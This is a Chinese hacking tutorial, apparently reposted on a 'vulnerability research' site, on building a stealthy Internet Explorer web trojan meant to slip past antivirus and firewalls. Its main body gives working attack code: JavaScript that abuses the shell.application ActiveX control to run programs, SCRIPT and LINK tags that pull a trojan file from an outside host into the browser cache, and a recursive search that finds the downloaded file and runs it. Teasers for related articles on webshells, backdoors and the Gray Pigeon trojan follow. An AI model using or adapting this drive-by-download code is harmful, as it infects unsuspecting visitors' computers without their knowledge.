打造完美的IE网页木马_漏洞研究

作者:碧雪   来源:第八军团 

      既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项特征:  

  一:可以躲过杀毒软件的追杀;  

  二:可以避开网络防火墙的报警;  

  三:能够适用于多数的WINDOWS操作系统(主要包括WIN98、WINME、WIN2000、WINXP、WIN2003)中的多数IE版本(主要包括IE5.0、IE5.5、IE6.0),最好能打倒SP补丁;  

  四:让浏览者不容易发觉IE变化,即可以悄无声息,从而可以长久不被发现。  

  (注意以上四点只是指网页本身而言,但不包括你的木马程序,也就是说我们的网页木马只是负责运行指定的木马程序,至于你的木马程序的好坏只有你自己去选择啦!别找我要,我不会写的哦!)  

  满足以上四点我想才可以让你的马儿更青春更长久,跑的更欢更快……  

  看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足吧!  

  第一种:利用古老的MIME漏洞的IE网页木马  

  这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影响又太大,补丁差不多都补上啦,因此这种木马的种植成功率比较低。  

  第二种:利用com.ms.activeX.ActiveXComponent漏洞,结合WSH及FSO控件的IE网页木马  

  虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数IE版本中,是一个比较好的漏洞,利用价值非常高,但却因为它结合了流行的病毒调用的WSH及FSO控件,使其虽说可以避开网络防火墙的报警,可逃不脱杀毒软件的追捕(如诺顿)。  

  第三种:利用OBJECT对象类型确认漏洞(Object Data Remote)并结合WSH及FSO控件的IE网页木马(典型的代表有动鲨网页木马生成器)  

  此种木马最大的优点是适应的IE版本多,且漏洞较新,但却有如下不足:  

  1、因为此漏洞要调用Mshta.exe来访问网络下载木马程序,所以会引起防火墙报警(如天网防火墙);  

  2、如果此IE网页木马又利用了WSH及FSO控件,同样逃不脱杀毒软件的追捕(如诺顿),而  

动鲨网页木马又恰恰使用了WSH及FSO控件,叹口气……可惜呀……?  

  3、再有就是这个漏洞需要网页服务器支持动态网页如ASP、JSP、CGI等,这就影响了它的发挥,毕竟现在的免费稳定的动态网页空间是少之又少;虽说此漏洞也可利用邮件MIME的形式(见我在安全焦点上发表的文章:《由错误MIME漏洞的利用想到的......---IE Object Data 数据远程执行漏洞的利用》http://www.xfocus.net/articles/200309/607.html)来利用,但经测试发现对IE6.0不起作用。  

  看到上面的分析你是不是有了这种感觉:千军易得,一将难求,马儿成群,奈何千里马难寻!别急,下面让我带这大家一起打造我心中的完美IE网页木马。  

  首先要躲过杀毒软件的追杀,我们就不能利用WSH和FSO控件,因为只要利用了WSH和FSO控件就一定逃不脱“诺顿”的追杀,这可叫我们该如何是好?!别急,经过我的努力工作(说真的我也是在研究ASP木马时偶然发现的灵感)终于我有找到了一个可以用的控件,那就是 shell.application,并且它可是经过了安全认证的,可以在“我的电脑”域中的网页中畅通无阻的执行,比WSH和FSO更容易得到执行权限(利用跨域漏洞即可),请看下面javascript代码:  

<SCRIPT LANGUAGE="javascript" type="text/javascript">  

var shell=new ActiveXObject("shell.application");  

shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb();  

</SCRIPT>  

保存为test.htm后打开看是否自动打开了记事本程序,而且不会象WSH和FSO那样出现是否允许运行的提示框,是不是有点兴趣啦?现在我们已可以运行所有已知路径的程序,但我们要求运行我们自己的木马程序,所以还要求把我们的木马程序下载到浏览者的电脑上并找出它的位置。我们一个个来解决:  

  1、下载木马程序到浏览者的电脑中  

  这一点可以有很多解决方法,比如我以前提到的WINDOWS帮助文件访问协议下载任意文件漏洞(its:),不过这次我们不用它,再教大家两个更好的下载方法:  

  例一:利用SCRIPT标签,代码如下:  

<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>  

注意此处的LANGUAGE属性可以为除javascript、VBScript、JScript以外的字符串,也可以是汉字,至于src的属性当然是你的木马程序的地址啦!因为现在免费空间出于安全考虑,多数不允许上传exe文件,我们可以变通一下把扩展名exe改为bat或pif、scr、com,同样可以运行。  

  例二:利用LINK标签,代码如下:  

<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat" rel=stylesheet type=text/css>  

把代码放在标签<HEAD></HEAD>中间,href属性值为木马程序的地址。  

上面两个是我所知的最好的两种下载木马程序的方法,它们下载后的程序都保存在在IE临时目录Temporary Internet Files目录下的子目录中。  

  2、找出已下载到浏览者的脑中的木马程序路径  

  我们可以利用shell.application控件的一些属性和方法,并结合js的错误处理try{}catch(e){}finally{}语句,进行递归调用来找到木马程序的路径,代码如下: function icyfoxlovelace(){  

//得到WINDOWS系统目录和系统盘  

url=document.location.href;  

xtmu=url.substring(6,url.indexOf('\\',9)+1);  

xtp=url.substr(6,3);  

var shell=new ActiveXObject("shell.application");  

var runbz=1;  

//此处设置木马程序的大小,以字节为单位  

//请把198201改为你的木马程序的实际大小  

var exeSize=198201;  

//设置木马程序名及扩展名(exe,com,bat,pif,scr),用于判断是否是所下载的木马程序  

//请把下面两行中的icyfox改为你的木马程序名,bat改为你的木马程序的扩展名  

var a=/icyfox\[\d*\]\.bat/gi;  

a.compile("icyfox\\[\\d*\\]\\.bat","gi");  

var b=/[A-Za-z]:\\/gi;  

b.compile("[A-Za-z]:\\\\","gi");//正则表达式,用于判断是否是盘的根目录  

//下面的代码查找并运行木马程序  

wjj(xtmu+"Temporary Internet Files\\");//Content.IE5\if(runbz)wjj(xtp+"Documents and Settings\\");  

if(runbz)yp();  

//在所有硬盘分区下查找并运行木马程序  

function yp(){  

try{  

var c=new Enumerator(shell.namespace("c:\\").ParentFolder.Items());  

for (;!c.atEnd();c.moveNext()){  

if(runbz){if(b.test(c.item().path))wjj(c.item().path);}  

else break;  

}  

}catch(e){}  

}  

//利用递归在指定目录(包括子目录)下查找并运行木马程序  

function wjj(b){  

try{  

var c=new Enumerator(shell.namespace(b).Items());  

for (;!c.atEnd();c.moveNext()){  

if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){  

var f=c.item().path;  

var v=f.lastIndexOf('\\')+1;  

try{  

shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb();//运行木马程序  

runbz=0;  

break;  

}catch(e){}  

}  

if(!c.item().Size)wjj(c.item().path+"\\");//如果是子目录则递归调用  

}  

}catch(e){}  

}  

}  

icyfoxlovelace();  

请把以上代码保存为icyfox.js。  

时间: 2024-10-14 08:46:42

打造完美的IE网页木马_漏洞研究的相关文章

打造完美的IE网页木马

既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项特征: 一:可以躲过杀毒软件的追杀: 二:可以避开网络防火墙的报警: 三:能够适用于多数的WINDOWS操作系统(主要包括WIN98.WINME.WIN2000.WINXP.WIN2003)中的多数IE版本(主要包括IE5.0.IE5.5.IE6.0),最好能打倒SP补丁: 四:让浏览者不容易发觉IE变化,即可以悄无声息,从而可以长久不被发现. (注意以上四点只是指网页本身而言,但

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

再探九酷网络个人主页空间管理系统_漏洞研究

本文作者:玄猫[B.C.T]  本文原发表于<黑客X档案>2005年第7期,网上首发地址为B.C.T(http://www.cnbct.org/showarticle.asp?id=495)和黑色森林(http://www.blackwoosd.cn)  本文版权归<黑客X档案>和作者杂志社所有   --------------------------------------------------------------------------------  玄猫在2004年12

“灰鸽子”网页木马从原理、制作到防范(图)_漏洞研究

事物都有两面性.本文介绍的网页木马制作技巧,意在加强大家的防范意识,而不是想"荼毒生灵".希望能给大家带来一些帮助,营造一个安全的上网环境. 如果你访问××网站(国内某门户网站),你就会中灰鸽子木马.这是我一黑客朋友给我说的一句说.打开该网站的首页,经检查,我确实中了灰鸽子.怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马:一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马. 以上只是网页木马的两种形式,实际上

利用IE Object Data漏洞制做全新网页木马(图)_漏洞研究

原发黑客x档案第8期,版权归杂志所有. 利用Internet Explorer Object Data漏洞制做全新网页木马lcx今年8月20日,微软公布了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞.这对于网页木马爱好者来说可是一件好事,我们可以用这个漏洞来制做一款全新的暂时不会被查杀的木马了.在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞.一.漏洞描述该漏洞内由eEye Digital Security发现并于8月20号公布的,微

打造一款永生的Windows操作系统_漏洞研究

Windows给我们带来方便的同时,也让我们不得不忍受系统从崩溃→重装的痛苦.于是如何延长Windows的使用寿命,减少重装次数,也就提上了我们的日程--  事实上,通常出现的一些诸如蓝屏.死机等现象,大多是由于某些系统文件操作不当或者感染病毒而造成损坏.丢失的缘故,都只是一些小问题.只要我们动动脑筋,就能解决这些故障,而根本不必重装整个操作系统.这样除了可以节省大量的时间,鉴于目前Windows主要分为2000/XP以NT为核心的系列及Windows 9x/Me系列.因此,我们对它们分别述说.

webshell权限提升技巧_漏洞研究

WEBSHELL权限提升技巧 c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pro

你根本想不到的——IIS另类后门_漏洞研究

终于由学校步入了社会,发现其实学校还是有很多值得我们留恋的地方,而工作其实蛮辛苦的,最主要的是不能经常和朋友一起去网上玩了.上周六回了趟学校,在主机房里和做网管的朋友聊天,偶然发现一个很熟的ASP程序在服务器的网站目录里(以前我是学校网络组的成员之一),于是连了下看看,没有给予匿名浏览的权限,不过账号勾选的是记住密码,登录成功.网页显示"添加test2用户成功","添加test2管理员成功".呵呵,我连管理员密码都不知道呢.打开3389,叫朋友看了下用户列表-- 

网站程序中非SI漏洞的利用_漏洞研究

Part I 前言  现在网上最流行的网站攻击手段,要数得上SQL Injection了,虽然SI技术易学易用,并且容易取得较大的权限,但因其风头实在太大,现在一般稍有点安全意识的程序员都会注意到这个问题,并且通过GET方法提交的数据会被服务器记录在案,而让网管很容易找到入侵者.  非SI类攻击相对来说获得的服务器操作权限不大,但对于以获得数据为目的的入侵还是很有用的.  Part II 方法介绍  常规的非SI类攻击有如下几种:  一. 跨站脚本攻击(XSS)  跨站脚本攻击不会直接对网站服务